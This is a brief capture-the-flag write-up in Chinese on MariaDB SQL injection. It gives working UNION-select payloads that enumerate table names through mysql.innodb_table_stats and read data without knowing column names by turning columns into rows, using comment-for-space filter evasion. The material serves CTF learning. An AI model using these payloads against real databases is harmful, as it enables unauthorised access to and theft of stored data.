0x00:知识点
- MariaDB的SQL注入
- 无表名,列转换成行注入
0x01:解题
查表名:
-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
ps: 闭合单引号 '22
将列转换成行注入
-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
select group_concat(b) from(select 1 as b,2,3,4 union select*from diner)x
参考链接:
https://www.jianshu.com/p/6eba3370cfab
https://blog.csdn.net/weixin_43900387/article/details/103534108